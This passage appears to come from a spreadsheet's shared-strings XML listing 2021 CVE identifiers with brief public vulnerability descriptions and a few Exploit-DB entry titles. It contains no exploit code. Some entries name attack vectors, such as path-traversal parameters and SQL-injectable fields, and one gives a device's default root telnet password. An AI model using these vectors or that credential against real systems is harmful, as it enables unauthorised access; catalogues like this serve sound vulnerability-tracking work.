  <si>
    <t>CVE-2021-37414</t>
  </si>
  <si>
    <t>Zoho ManageEngine DesktopCentral before 10.0.709 allows anyone to get a valid user's APIKEY without authentication.</t>
  </si>
  <si>
    <t>CVE-2021-37415</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus before 11302 is vulnerable to authentication bypass that allows a few REST-API URLs without authentication.</t>
  </si>
  <si>
    <t>CVE-2021-37416</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.</t>
  </si>
  <si>
    <t>CVE-2021-37417</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus version 6103 and prior allows CAPTCHA bypass due to improper parameter validation.</t>
  </si>
  <si>
    <t>CVE-2021-37419</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus before 6112 is vulnerable to SSRF.</t>
  </si>
  <si>
    <t>CVE-2021-37420</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus before 6112 is vulnerable to mail spoofing.</t>
  </si>
  <si>
    <t>CVE-2021-37421</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus 6103 and prior is vulnerable to admin portal access-restriction bypass.</t>
  </si>
  <si>
    <t>CVE-2021-37422</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus 6111 and prior is vulnerable to SQL Injection while linking the databases.</t>
  </si>
  <si>
    <t>CVE-2021-37423</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus 6111 and prior is vulnerable to linked applications takeover.</t>
  </si>
  <si>
    <t>CVE-2021-37424</t>
  </si>
  <si>
    <t>ManageEngine ADSelfService Plus before 6112 is vulnerable to domain user account takeover.</t>
  </si>
  <si>
    <t>CVE-2021-37425</t>
  </si>
  <si>
    <t>Altova MobileTogether Server before 7.3 SP1 allows XXE attacks, such as an InfoSetChanges/Changes attack against /workflowmanagement, or reading mobiletogetherserver.cfg and then reading the certificate and private key.</t>
  </si>
  <si>
    <t>CVE-2021-3743</t>
  </si>
  <si>
    <t>An out-of-bounds (OOB) memory read flaw was found in the Qualcomm IPC router protocol in the Linux kernel. A missing sanity check allows a local attacker to gain access to out-of-bounds memory, leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37436</t>
  </si>
  <si>
    <t>Amazon Echo Dot devices through 2021-07-02 sometimes allow attackers, who have physical access to a device after a factory reset, to obtain sensitive information via a series of complex hardware and software attacks. NOTE: reportedly, there were vendor marketing statements about safely removing personal content via a factory reset. Also, the vendor has reportedly indicated that they are working on mitigations.</t>
  </si>
  <si>
    <t>CVE-2021-37439</t>
  </si>
  <si>
    <t>NCH FlexiServer v6.00 suffers from a syslog?file=/.. path traversal vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3744</t>
  </si>
  <si>
    <t>A memory leak flaw was found in the Linux kernel in the ccp_run_aes_gcm_cmd() function in drivers/crypto/ccp/ccp-ops.c, which allows attackers to cause a denial of service (memory consumption). This vulnerability is similar with the older CVE-2019-18808.</t>
  </si>
  <si>
    <t>CVE-2021-37440</t>
  </si>
  <si>
    <t>NCH Axon PBX v2.22 and earlier allows path traversal for file disclosure via the logprop?file=/.. substring.</t>
  </si>
  <si>
    <t>CVE-2021-37441</t>
  </si>
  <si>
    <t>NCH Axon PBX v2.22 and earlier allows path traversal for file deletion via the logdelete?file=/.. substring.</t>
  </si>
  <si>
    <t>CVE-2021-37442</t>
  </si>
  <si>
    <t>NCH IVM Attendant v5.12 and earlier allows path traversal via viewfile?file=/.. to read files.</t>
  </si>
  <si>
    <t>CVE-2021-37443</t>
  </si>
  <si>
    <t>NCH IVM Attendant v5.12 and earlier allows path traversal via the logdeleteselected check0 parameter for file deletion.</t>
  </si>
  <si>
    <t>CVE-2021-37444</t>
  </si>
  <si>
    <t>NCH IVM Attendant v5.12 and earlier suffers from a directory traversal weakness upon uploading plugins in a ZIP archive. This can lead to code execution if a ZIP element's pathname is set to a Windows startup folder, a file for the inbuilt Out-Going Message function, or a file for the the inbuilt Autodial function.</t>
  </si>
  <si>
    <t>CVE-2021-37445</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, an authenticated user can use directory traversal via logprop?file=/.. for file reading.</t>
  </si>
  <si>
    <t>CVE-2021-37446</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, an authenticated user can use directory traversal via documentprop?file=/.. for file reading.</t>
  </si>
  <si>
    <t>CVE-2021-37447</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, an authenticated user can use directory traversal via documentdelete?file=/.. for file deletion.</t>
  </si>
  <si>
    <t>CVE-2021-37448</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH IVM Attendant v5.12 and earlier via the Mailbox name (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37449</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH IVM Attendant v5.12 and earlier via /ogmlist?folder= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-3745</t>
  </si>
  <si>
    <t>flatcore-cms is vulnerable to Unrestricted Upload of File with Dangerous Type</t>
  </si>
  <si>
    <t>CVE-2021-37450</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH IVM Attendant v5.12 and earlier via /ogmprop?id= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37451</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH IVM Attendant v5.12 and earlier via /msglist?mbx= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37452</t>
  </si>
  <si>
    <t>NCH Quorum v2.03 and earlier allows local users to discover cleartext login information relating to users by reading the local .dat configuration files.</t>
  </si>
  <si>
    <t>CVE-2021-37453</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the extension name (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37454</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the line name (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37455</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the outbound dialing plan (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37456</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the blacklist IP address (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37457</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the SipRule field (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37458</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the primary phone field (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37459</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via the customer name field (stored).</t>
  </si>
  <si>
    <t>CVE-2021-3746</t>
  </si>
  <si>
    <t>A flaw was found in the libtpms code that may cause access beyond the boundary of internal buffers. The vulnerability is triggered by specially-crafted TPM2 command packets that then trigger the issue when the state of the TPM2's volatile state is written. The highest threat from this vulnerability is to system availability. This issue affects libtpms versions before 0.8.5, before 0.7.9 and before 0.6.6.</t>
  </si>
  <si>
    <t>CVE-2021-37460</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via /planprop?id= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37461</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via /extensionsinstruction?id= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37462</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) exists in NCH Axon PBX v2.22 and earlier via /ipblacklist?errorip= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37463</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, XSS exists via User Display Name (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37464</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, XSS exists via Conference Description (stored).</t>
  </si>
  <si>
    <t>CVE-2021-37465</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, XSS exists via /uploaddoc?id= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37466</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, XSS exists via /conference?id= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37467</t>
  </si>
  <si>
    <t>In NCH Quorum v2.03 and earlier, XSS exists via /conferencebrowseuploadfile?confid= (reflected).</t>
  </si>
  <si>
    <t>CVE-2021-37468</t>
  </si>
  <si>
    <t>NCH Reflect CRM 3.01 allows local users to discover cleartext user account information by reading the configuration files.</t>
  </si>
  <si>
    <t>CVE-2021-37469</t>
  </si>
  <si>
    <t>In NCH WebDictate v2.13 and earlier, authenticated users can abuse logprop?file=/.. path traversal to read files on the filesystem.</t>
  </si>
  <si>
    <t>CVE-2021-3747</t>
  </si>
  <si>
    <t>The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner.</t>
  </si>
  <si>
    <t>CVE-2021-37470</t>
  </si>
  <si>
    <t>In NCH WebDictate v2.13, persistent Cross Site Scripting (XSS) exists in the Recipient Name field. An authenticated user can add or modify the affected field to inject arbitrary JavaScript.</t>
  </si>
  <si>
    <t>CVE-2021-37471</t>
  </si>
  <si>
    <t>Cradlepoint IBR900-600 devices running versions &lt; 7.21.10 are vulnerable to a restricted shell escape sequence that provides an attacker the capability to simultaneously deny availability to the device's NetCloud Manager console, local console and SSH command-line.</t>
  </si>
  <si>
    <t>CVE-2021-37473</t>
  </si>
  <si>
    <t>In NavigateCMS version 2.9.4 and below, function in `product.php` is vulnerable to sql injection on parameter `products-order` through a post request, which results in arbitrary sql query execution in the backend database.</t>
  </si>
  <si>
    <t>CVE-2021-37475</t>
  </si>
  <si>
    <t>In NavigateCMS version 2.9.4 and below, function in `templates.php` is vulnerable to sql injection on parameter `template-properties-order`, which results in arbitrary sql query execution in the backend database.</t>
  </si>
  <si>
    <t>CVE-2021-37476</t>
  </si>
  <si>
    <t>In NavigateCMS version 2.9.4 and below, function in `product.php` is vulnerable to sql injection on parameter `id` through a post request, which results in arbitrary sql query execution in the backend database.</t>
  </si>
  <si>
    <t>CVE-2021-37477</t>
  </si>
  <si>
    <t>In NavigateCMS version 2.9.4 and below, function in `structure.php` is vulnerable to sql injection on parameter `children_order`, which results in arbitrary sql query execution in the backend database.</t>
  </si>
  <si>
    <t>CVE-2021-37478</t>
  </si>
  <si>
    <t>In NavigateCMS version 2.9.4 and below, function `block` is vulnerable to sql injection on parameter `block-order`, which results in arbitrary sql query execution in the backend database.</t>
  </si>
  <si>
    <t>CVE-2021-3748</t>
  </si>
  <si>
    <t>A use-after-free vulnerability was found in the virtio-net device of QEMU. It could occur when the descriptor's address belongs to the non direct access region, due to num_buffers being set after the virtqueue elem has been unmapped. A malicious guest could use this flaw to crash QEMU, resulting in a denial of service condition, or potentially execute code on the host with the privileges of the QEMU process.</t>
  </si>
  <si>
    <t>CVE-2021-3749</t>
  </si>
  <si>
    <t>axios is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>1333</t>
  </si>
  <si>
    <t>CVE-2021-3750</t>
  </si>
  <si>
    <t>A DMA reentrancy issue was found in the USB EHCI controller emulation of QEMU. EHCI does not verify if the Buffer Pointer overlaps with its MMIO region when it transfers the USB packets. Crafted content may be written to the controller's registers and trigger undesirable actions (such as reset) while the device is still transferring packets. This can ultimately lead to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition, or potentially execute arbitrary code within the context of the QEMU process on the host. This flaw affects QEMU versions before 7.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-37504</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the fileNameStr parameter of jQuery-Upload-File v4.0.11 allows attackers to execute arbitrary web scripts or HTML via a crafted file with a Javascript payload in the file name.</t>
  </si>
  <si>
    <t>CVE-2021-3751</t>
  </si>
  <si>
    <t>libmobi is vulnerable to Out-of-bounds Write</t>
  </si>
  <si>
    <t>CVE-2021-37517</t>
  </si>
  <si>
    <t>An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.0,in the forgot-password function becuase the application allows email addresses as usernames, which can cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3752</t>
  </si>
  <si>
    <t>A use-after-free flaw was found in the Linux kernel’s Bluetooth subsystem in the way user calls connect to the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the system or escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37524</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in FusionPBX 4.5.26 allows remote unauthenticated users to inject arbitrary web script or HTML via an unsanitized "path" parameter in resources/login.php.</t>
  </si>
  <si>
    <t>CVE-2021-37529</t>
  </si>
  <si>
    <t>A double-free vulnerability exists in fig2dev through 3.28a is affected by: via the free_stream function in readpics.c, which could cause a denial of service (context-dependent).</t>
  </si>
  <si>
    <t>CVE-2021-3753</t>
  </si>
  <si>
    <t>A race problem was seen in the vt_k_ioctl in drivers/tty/vt/vt_ioctl.c in the Linux kernel, which may cause an out of bounds read in vt as the write access to vc_mode is not protected by lock-in vt_ioctl (KDSETMDE). The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-37530</t>
  </si>
  <si>
    <t>A denial of service vulnerabiity exists in fig2dev through 3.28a due to a segfault in the open_stream function in readpics.c.</t>
  </si>
  <si>
    <t>CVE-2021-37531</t>
  </si>
  <si>
    <t>SAP NetWeaver Knowledge Management XML Forms versions - 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, contains an XSLT vulnerability which allows a non-administrative authenticated attacker to craft a malicious XSL stylesheet file containing a script with OS-level commands, copy it into a location to be accessed by the system and then create a file which will trigger the XSLT engine to execute the script contained within the malicious XSL file. This can result in a full compromise of the confidentiality, integrity, and availability of the system.</t>
  </si>
  <si>
    <t>CVE-2021-37532</t>
  </si>
  <si>
    <t>SAP Business One version - 10, due to improper input validation, allows an authenticated User to gain access to directory and view the contents of index in the directory, which would otherwise be restricted to high privileged User.</t>
  </si>
  <si>
    <t>CVE-2021-37534</t>
  </si>
  <si>
    <t>app/View/GalaxyClusters/add.ctp in MISP 2.4.146 allows Stored XSS when forking a galaxy cluster.</t>
  </si>
  <si>
    <t>CVE-2021-37535</t>
  </si>
  <si>
    <t>SAP NetWeaver Application Server Java (JMS Connector Service) - versions 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform necessary authorization checks for user privileges.</t>
  </si>
  <si>
    <t>CVE-2021-37538</t>
  </si>
  <si>
    <t>Multiple SQL injection vulnerabilities in SmartDataSoft SmartBlog for PrestaShop before 4.06 allow a remote unauthenticated attacker to execute arbitrary SQL commands via the day, month, or year parameter to the controllers/front/archive.php archive controller, or the id_category parameter to the controllers/front/category.php category controller.</t>
  </si>
  <si>
    <t>CVE-2021-37539</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus before 7111 is vulnerable to unrestricted file which leads to Remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3754</t>
  </si>
  <si>
    <t>A flaw was found in keycloak where an attacker is able to register himself with the username same as the email ID of any existing user. This may cause trouble in getting password recovery email in case the user forgets the password.</t>
  </si>
  <si>
    <t>CVE-2021-37540</t>
  </si>
  <si>
    <t>In JetBrains Hub before 2021.1.13262, a potentially insufficient CSP for the Widget deployment feature was used.</t>
  </si>
  <si>
    <t>CVE-2021-37541</t>
  </si>
  <si>
    <t>In JetBrains Hub before 2021.1.13402, HTML injection in the password reset email was possible.</t>
  </si>
  <si>
    <t>CVE-2021-37542</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, XSS was possible.</t>
  </si>
  <si>
    <t>CVE-2021-37543</t>
  </si>
  <si>
    <t>In JetBrains RubyMine before 2021.1.1, code execution without user confirmation was possible for untrusted projects.</t>
  </si>
  <si>
    <t>CVE-2021-37544</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.4, there was an insecure deserialization.</t>
  </si>
  <si>
    <t>CVE-2021-37545</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2021.1.1, insufficient authentication checks for agent requests were made.</t>
  </si>
  <si>
    <t>CVE-2021-37546</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2021.1, an insecure key generation mechanism for encrypted properties was used.</t>
  </si>
  <si>
    <t>CVE-2021-37547</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.4, insufficient checks during file uploading were made.</t>
  </si>
  <si>
    <t>CVE-2021-37548</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2021.1, passwords in cleartext sometimes could be stored in VCS.</t>
  </si>
  <si>
    <t>CVE-2021-37549</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.1.11111, sandboxing in workflows was insufficient.</t>
  </si>
  <si>
    <t>CVE-2021-37550</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.2.16363, time-unsafe comparisons were used.</t>
  </si>
  <si>
    <t>CVE-2021-37551</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.2.16363, system user passwords were hashed with SHA-256.</t>
  </si>
  <si>
    <t>CVE-2021-37552</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.2.17925, stored XSS was possible.</t>
  </si>
  <si>
    <t>CVE-2021-37553</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.2.16363, an insecure PRNG was used.</t>
  </si>
  <si>
    <t>CVE-2021-37554</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.3.21051, a user could see boards without having corresponding permissions.</t>
  </si>
  <si>
    <t>CVE-2021-37555</t>
  </si>
  <si>
    <t>TX9 Automatic Food Dispenser v3.2.57 devices allow access to a shell as root/superuser, a related issue to CVE-2019-16734. To connect, the telnet service is used on port 23 with the default password of 059AnkJ for the root account. The user can then download the filesystem through preinstalled BusyBox utilities (e.g., tar and nc).</t>
  </si>
  <si>
    <t>CVE-2021-37556</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in reporting export in Centreon before 20.04.14, 20.10.8, and 21.04.2 allows remote authenticated (but low-privileged) attackers to execute arbitrary SQL commands via the include/reporting/dashboard/csvExport/csv_HostGroupLogs.php start and end parameters.</t>
  </si>
  <si>
    <t>CVE-2021-37557</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in image generation in Centreon before 20.04.14, 20.10.8, and 21.04.2 allows remote authenticated (but low-privileged) attackers to execute arbitrary SQL commands via the include/views/graphs/generateGraphs/generateImage.php index parameter.</t>
  </si>
  <si>
    <t>CVE-2021-37558</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in a MediaWiki script in Centreon before 20.04.14, 20.10.8, and 21.04.2 allows remote unauthenticated attackers to execute arbitrary SQL commands via the host_name and service_description parameters. The vulnerability can be exploited only when a valid Knowledge Base URL is configured on the Knowledge Base configuration page and points to a MediaWiki instance. This relates to the proxy feature in class/centreon-knowledge/ProceduresProxy.class.php and include/configuration/configKnowledge/proxy/proxy.php.</t>
  </si>
  <si>
    <t>CVE-2021-3756</t>
  </si>
  <si>
    <t>libmysofa is vulnerable to Heap-based Buffer Overflow</t>
  </si>
  <si>
    <t>CVE-2021-37560</t>
  </si>
  <si>
    <t>CVE-2021-37561</t>
  </si>
  <si>
    <t>CVE-2021-37562</t>
  </si>
  <si>
    <t>CVE-2021-37563</t>
  </si>
  <si>
    <t>CVE-2021-37564</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle IEEE 1905 protocols. (Affected Chipsets MT7603E, MT7613, MT7615, MT7622, MT7628, MT7629, MT7915; Affected Software Versions 2.0.2; Out-of-bounds read).</t>
  </si>
  <si>
    <t>CVE-2021-37565</t>
  </si>
  <si>
    <t>CVE-2021-37566</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle IEEE 1905 protocols. (Affected Chipsets MT7603E, MT7610, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915; Affected Software Versions 2.0.2; Out-of-bounds write).</t>
  </si>
  <si>
    <t>CVE-2021-37567</t>
  </si>
  <si>
    <t>CVE-2021-37568</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle IEEE 1905 protocols. (Affected Chipsets MT7603E, MT7613, MT7615, MT7622, MT7628, MT7629, MT7915; Affected Software Versions 2.0.2; Out-of-bounds write).</t>
  </si>
  <si>
    <t>CVE-2021-37569</t>
  </si>
  <si>
    <t>CVE-2021-3757</t>
  </si>
  <si>
    <t>immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</t>
  </si>
  <si>
    <t>CVE-2021-37570</t>
  </si>
  <si>
    <t>CVE-2021-37571</t>
  </si>
  <si>
    <t>CVE-2021-37572</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle IEEE 1905 protocols. (Affected Chipsets MT7603E, MT7613, MT7615, MT7622, MT7628, MT7629, MT7915; Affected Software Versions 2.0.2; Missing authorization).</t>
  </si>
  <si>
    <t>CVE-2021-37573</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) &lt;=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page</t>
  </si>
  <si>
    <t>CVE-2021-37576</t>
  </si>
  <si>
    <t>arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e.</t>
  </si>
  <si>
    <t>CVE-2021-37578</t>
  </si>
  <si>
    <t>Apache jUDDI uses several classes related to Java's Remote Method Invocation (RMI) which (as an extension to UDDI) provides an alternate transport for accessing UDDI services. RMI uses the default Java serialization mechanism to pass parameters in RMI invocations. A remote attacker can send a malicious serialized object to the above RMI entries. The objects get deserialized without any check on the incoming data. In the worst case, it may let the attacker run arbitrary code remotely. For both jUDDI web service applications and jUDDI clients, the usage of RMI is disabled by default. Since this is an optional feature and an extension to the UDDI protocol, the likelihood of impact is low. Starting with 3.3.10, all RMI related code was removed.</t>
  </si>
  <si>
    <t>CVE-2021-37579</t>
  </si>
  <si>
    <t>The Dubbo Provider will check the incoming request and the corresponding serialization type of this request meet the configuration set by the server. But there's an exception that the attacker can use to skip the security check (when enabled) and reaching a deserialization operation with native java serialization. Apache Dubbo 2.7.13, 3.0.2 fixed this issue by quickly fail when any unrecognized request was found.</t>
  </si>
  <si>
    <t>CVE-2021-3758</t>
  </si>
  <si>
    <t>bookstack is vulnerable to Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>exploits/windows/remote/50958.txt</t>
  </si>
  <si>
    <t>Virtua Software Cobranca 12S - SQLi</t>
  </si>
  <si>
    <t>CVE-2021-37580</t>
  </si>
  <si>
    <t>A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0</t>
  </si>
  <si>
    <t>CVE-2021-37583</t>
  </si>
  <si>
    <t>CVE-2021-37584</t>
  </si>
  <si>
    <t>CVE-2021-37586</t>
  </si>
  <si>
    <t>The PowerPlay Web component of Mitel Interaction Recording Multitenancy systems before 6.7 could allow a user (with Administrator rights) to replay a previously recorded conversation of another tenant due to insufficient validation.</t>
  </si>
  <si>
    <t>CVE-2021-37587</t>
  </si>
  <si>
    <t>In Charm 0.43, any single user can decrypt DAC-MACS or MA-ABE-YJ14 data.</t>
  </si>
  <si>
    <t>CVE-2021-37588</t>
  </si>
  <si>
    <t>In Charm 0.43, any two users can collude to achieve the ability to decrypt YCT14 data.</t>
  </si>
  <si>
    <t>CVE-2021-37589</t>
  </si>
  <si>
    <t>Virtua Cobranca before 12R allows SQL Injection on the login page.</t>
  </si>
  <si>
    <t>CVE-2021-3759</t>
  </si>
  <si>
    <t>A memory overflow vulnerability was found in the Linux kernel’s ipc functionality of the memcg subsystem, in the way a user calls the semget function multiple times, creating semaphores. This flaw allows a local user to starve the resources, causing a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50142.txt</t>
  </si>
  <si>
    <t>PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection</t>
  </si>
  <si>
    <t>CVE-2021-37592</t>
  </si>
  <si>
    <t>Suricata before 5.0.8 and 6.x before 6.0.4 allows TCP evasion via a client with a crafted TCP/IP stack that can send a certain sequence of segments.</t>
  </si>
  <si>
    <t>CVE-2021-37593</t>
  </si>
  <si>
    <t>PEEL Shopping version 9.4.0 allows remote SQL injection. A public user/guest (unauthenticated) can inject a malicious SQL query in order to affect the execution of predefined SQL commands. Upon a successful SQL injection attack, an attacker can read sensitive data from the database and possibly modify database data.</t>
  </si>
  <si>
    <t>CVE-2021-37594</t>
  </si>
  <si>
    <t>In FreeRDP before 2.4.0 on Windows, wf_cliprdr_server_file_contents_request in client/Windows/wf_cliprdr.c has missing input checks for a FILECONTENTS_SIZE File Contents Request PDU.</t>
  </si>
  <si>
    <t>CVE-2021-37595</t>
  </si>
  <si>
    <t>In FreeRDP before 2.4.0 on Windows, wf_cliprdr_server_file_contents_request in client/Windows/wf_cliprdr.c has missing input checks for a FILECONTENTS_RANGE File Contents Request PDU.</t>
  </si>
  <si>
    <t>CVE-2021-37596</t>
  </si>
  <si>
    <t>Telegram Web K Alpha 0.6.1 allows XSS via a document name.</t>
  </si>
  <si>
    <t>CVE-2021-37597</t>
  </si>
  <si>
    <t>WP Cerber before 8.9.3 allows MFA bypass via wordpress_logged_in_[hash] manipulation.</t>
  </si>
  <si>
    <t>CVE-2021-37598</t>
  </si>
  <si>
    <t>WP Cerber before 8.9.3 allows bypass of /wp-json access control via a trailing ? character.</t>
  </si>
  <si>
    <t>CVE-2021-37599</t>
  </si>
  <si>
    <t>The exporter/Login.aspx login form in the Exporter in Nuance Winscribe Dictation 4.1.0.99 is vulnerable to SQL injection that allows a remote, unauthenticated attacker to read the database (and execute code in some situations) via the txtPassword parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3760</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel. A use-after-free vulnerability in the NFC stack can lead to a threat to confidentiality, integrity, and system availability.</t>
  </si>
  <si>
    <t>CVE-2021-37600</t>
  </si>
  <si>
    <t>** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.</t>
  </si>
  <si>
    <t>CVE-2021-37601</t>
  </si>
  <si>
    <t>muc.lib.lua in Prosody 0.11.0 through 0.11.9 allows remote attackers to obtain sensitive information (list of admins, members, owners, and banned entities of a Multi-User chat room) in some common configurations.</t>
  </si>
  <si>
    <t>CVE-2021-37604</t>
  </si>
  <si>
    <t>In version 6.5 of Microchip MiWi software and all previous versions including legacy products, there is a possibility of frame counters being validated/updated prior to the message authentication. With this vulnerability in place, an attacker may increment the incoming frame counter values by injecting messages with a sufficiently large frame counter value and invalid payload. This results in denial of service/valid packets in the network. There is also a possibility of a replay attack in the stack.</t>
  </si>
  <si>
    <t>CVE-2021-37605</t>
  </si>
  <si>
    <t>In version 6.5 Microchip MiWi software and all previous versions including legacy products, the stack is validating only two out of four Message Integrity Check (MIC) bytes.</t>
  </si>
  <si>
    <t>CVE-2021-37606</t>
  </si>
  <si>
    <t>Meow hash 0.5/calico does not sufficiently thwart key recovery by an attacker who can query whether there's a collision in the bottom bits of the hashes of two messages, as demonstrated by an attack against a long-running web service that allows the attacker to infer collisions by measuring timing differences.</t>
  </si>
  <si>
    <t>CVE-2021-37608</t>
  </si>
  <si>
    <t>Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz allows an attacker to execute remote commands. This issue affects Apache OFBiz version 17.12.07 and prior versions. Upgrade to at least 17.12.08 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12297.</t>
  </si>
  <si>
    <t>CVE-2021-3761</t>
  </si>
  <si>
    <t>Any CA issuer in the RPKI can trick OctoRPKI prior to 1.3.0 into emitting an invalid VRP "MaxLength" value, causing RTR sessions to terminate. An attacker can use this to disable RPKI Origin Validation in a victim network (for example AS 13335 - Cloudflare) prior to launching a BGP hijack which during normal operations would be rejected as "RPKI invalid". Additionally, in certain deployments RTR session flapping in and of itself also could cause BGP routing churn, causing availability issues.</t>
  </si>
  <si>
    <t>CVE-2021-37613</t>
  </si>
  <si>
    <t>Stormshield Network Security (SNS) 1.0.0 through 4.2.3 allows a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-37614</t>
  </si>
  <si>
